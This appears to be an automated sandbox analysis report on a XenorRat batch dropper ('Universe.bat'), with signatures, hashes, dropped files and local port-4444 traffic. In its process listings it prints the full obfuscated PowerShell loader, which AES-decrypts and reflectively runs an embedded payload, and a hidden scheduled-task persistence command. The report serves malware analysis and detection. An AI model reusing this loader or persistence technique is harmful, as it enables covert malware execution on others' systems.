Analysis Overview
SHA256
d78ea86672081dae69afc22f94de2ce5e6867653d42d9bb8d215703be3f9f25c
Threat Level: Known bad
The file Universe.bat was found to be: Known bad.
Malicious Activity Summary
XenorRat
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Enumerates physical storage devices
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-23 12:24
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-23 12:24
Reported
2024-08-23 12:27
Platform
win7-20240729-en
Max time kernel
14s
Max time network
19s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2296 wrote to memory of 300 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2296 wrote to memory of 300 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2296 wrote to memory of 300 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Universe.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SnMKy725nJUhiMQ+k00yZGWuadijDwJVVBtPnLEkkhk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('axNyr+j+G5sbsmbLId0ybw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FYtig=New-Object System.IO.MemoryStream(,$param_var); $DgoBB=New-Object System.IO.MemoryStream; $zfUXx=New-Object System.IO.Compression.GZipStream($FYtig, [IO.Compression.CompressionMode]::Decompress); $zfUXx.CopyTo($DgoBB); $zfUXx.Dispose(); $FYtig.Dispose(); $DgoBB.Dispose(); $DgoBB.ToArray();}function execute_function($param_var,$param2_var){ $dTUPB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vjclB=$dTUPB.EntryPoint; $vjclB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Universe.bat';$KcJLn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Universe.bat').Split([Environment]::NewLine);foreach ($wEtNx in $KcJLn) { if ($wEtNx.StartsWith(':: ')) { $xAoQG=$wEtNx.Substring(3); break; }}$payloads_var=[string[]]$xAoQG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
Files
memory/300-4-0x000007FEF5AFE000-0x000007FEF5AFF000-memory.dmp
memory/300-5-0x000000001B640000-0x000000001B922000-memory.dmp
memory/300-6-0x0000000002760000-0x0000000002768000-memory.dmp
memory/300-7-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp
memory/300-8-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp
memory/300-9-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp
memory/300-10-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp
memory/300-11-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-23 12:24
Reported
2024-08-23 12:27
Platform
win10v2004-20240802-en
Max time kernel
144s
Max time network
129s
Command Line
Signatures
XenorRat
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Universe.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SnMKy725nJUhiMQ+k00yZGWuadijDwJVVBtPnLEkkhk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('axNyr+j+G5sbsmbLId0ybw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FYtig=New-Object System.IO.MemoryStream(,$param_var); $DgoBB=New-Object System.IO.MemoryStream; $zfUXx=New-Object System.IO.Compression.GZipStream($FYtig, [IO.Compression.CompressionMode]::Decompress); $zfUXx.CopyTo($DgoBB); $zfUXx.Dispose(); $FYtig.Dispose(); $DgoBB.Dispose(); $DgoBB.ToArray();}function execute_function($param_var,$param2_var){ $dTUPB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vjclB=$dTUPB.EntryPoint; $vjclB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Universe.bat';$KcJLn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Universe.bat').Split([Environment]::NewLine);foreach ($wEtNx in $KcJLn) { if ($wEtNx.StartsWith(':: ')) { $xAoQG=$wEtNx.Substring(3); break; }}$payloads_var=[string[]]$xAoQG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_984_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_984.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1296,i,1602949858158667699,12464335823361976127,262144 --variations-seed-version --mojo-platform-channel-handle=4296 /prefetch:8
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_984.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_984.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SnMKy725nJUhiMQ+k00yZGWuadijDwJVVBtPnLEkkhk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('axNyr+j+G5sbsmbLId0ybw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FYtig=New-Object System.IO.MemoryStream(,$param_var); $DgoBB=New-Object System.IO.MemoryStream; $zfUXx=New-Object System.IO.Compression.GZipStream($FYtig, [IO.Compression.CompressionMode]::Decompress); $zfUXx.CopyTo($DgoBB); $zfUXx.Dispose(); $FYtig.Dispose(); $DgoBB.Dispose(); $DgoBB.ToArray();}function execute_function($param_var,$param2_var){ $dTUPB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vjclB=$dTUPB.EntryPoint; $vjclB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_984.bat';$KcJLn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_984.bat').Split([Environment]::NewLine);foreach ($wEtNx in $KcJLn) { if ($wEtNx.StartsWith(':: ')) { $xAoQG=$wEtNx.Substring(3); break; }}$payloads_var=[string[]]$xAoQG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 19.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:4444 | tcp | |
| N/A | 127.0.0.1:4444 | tcp | |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| N/A | 127.0.0.1:4444 | tcp | |
| N/A | 127.0.0.1:4444 | tcp | |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:4444 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| N/A | 127.0.0.1:4444 | tcp | |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:4444 | tcp | |
| N/A | 127.0.0.1:4444 | tcp | |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| N/A | 127.0.0.1:4444 | tcp | |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| N/A | 127.0.0.1:4444 | tcp | |
| N/A | 127.0.0.1:4444 | tcp | |
| N/A | 127.0.0.1:4444 | tcp |
Files
memory/2312-0-0x00007FFBBC923000-0x00007FFBBC925000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1dgsko4.hft.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2312-3-0x000001EF9EC40000-0x000001EF9EC62000-memory.dmp
memory/2312-11-0x00007FFBBC920000-0x00007FFBBD3E1000-memory.dmp
memory/2312-12-0x00007FFBBC920000-0x00007FFBBD3E1000-memory.dmp
memory/2312-13-0x000001EF9EC10000-0x000001EF9EC18000-memory.dmp
memory/2312-14-0x000001EFA1060000-0x000001EFA1094000-memory.dmp
memory/3092-25-0x00007FFBBC920000-0x00007FFBBD3E1000-memory.dmp
memory/3092-26-0x00007FFBBC920000-0x00007FFBBD3E1000-memory.dmp
memory/3092-27-0x00007FFBBC920000-0x00007FFBBD3E1000-memory.dmp
memory/3092-30-0x00007FFBBC920000-0x00007FFBBD3E1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b03f844e31d3cff178bf28968b6a618e |
| SHA1 | da8264e5da16e43515c3760954af5f9db717059b |
| SHA256 | 1767b4f469c955d68b8252cb68bf22ed7116ca4cd7793f877763f7e954a72c4a |
| SHA512 | c38ea43e6759407f1934db93461002e8006c0c24530ffe2a8002d4c4174f733339a7345cd8e2152aa653ef4d0a0a1ef98e97ea46deaadf98ac60ca904ed4f5d3 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6b8559593a74eb3b15c53a9fac9a469f |
| SHA1 | 13af213d1417edf30c03f76f9242c1975b2e4e74 |
| SHA256 | e053d1faabd6b36371f452e79cf70591cf45403a671746136a87198694a8fdb9 |
| SHA512 | 699b11eda97866809b696c96304bc218d7b72623fd537f83721f36a6c617d854fda7b6f01f7cb0bc0d55189c386e9b9fe6d111bb7c76cce492572b0a9961e974 |
C:\Users\Admin\AppData\Roaming\startup_str_984.vbs
| MD5 | 5b02c7370c7b81a6e4affa2d256d5f07 |
| SHA1 | 4601ce806f55f6ffef21decf0f3670e573d4fc38 |
| SHA256 | e44b1cb9e698656d1f0e2229e111a5aef43a7d3a3440c5a7fbd15902cd3141c0 |
| SHA512 | 49a1c57c0c0fb0b7a9b5af5ee4f9adc6ad4edd621ea64693515b4a87d2459ddbbc28dbeb4b9c0da20cef260c5797c7c4645c2ede06c9560f936767dab3380bef |
C:\Users\Admin\AppData\Roaming\startup_str_984.bat
| MD5 | b20843491bae175a8a3ea58950133d1a |
| SHA1 | 33552409f87c4b04f1a97e21c181e27327e0f847 |
| SHA256 | d78ea86672081dae69afc22f94de2ce5e6867653d42d9bb8d215703be3f9f25c |
| SHA512 | 998bfa168786a28b6d5dc1d682ee7a75eceee58980a4a643c6c89d52a521bc592aa261c653d24f697c4e092379f63816344ff3667a6acb9d21bbeb2016d8c18b |
memory/1160-49-0x0000021D287A0000-0x0000021D287B2000-memory.dmp
memory/2312-50-0x00007FFBBC920000-0x00007FFBBD3E1000-memory.dmp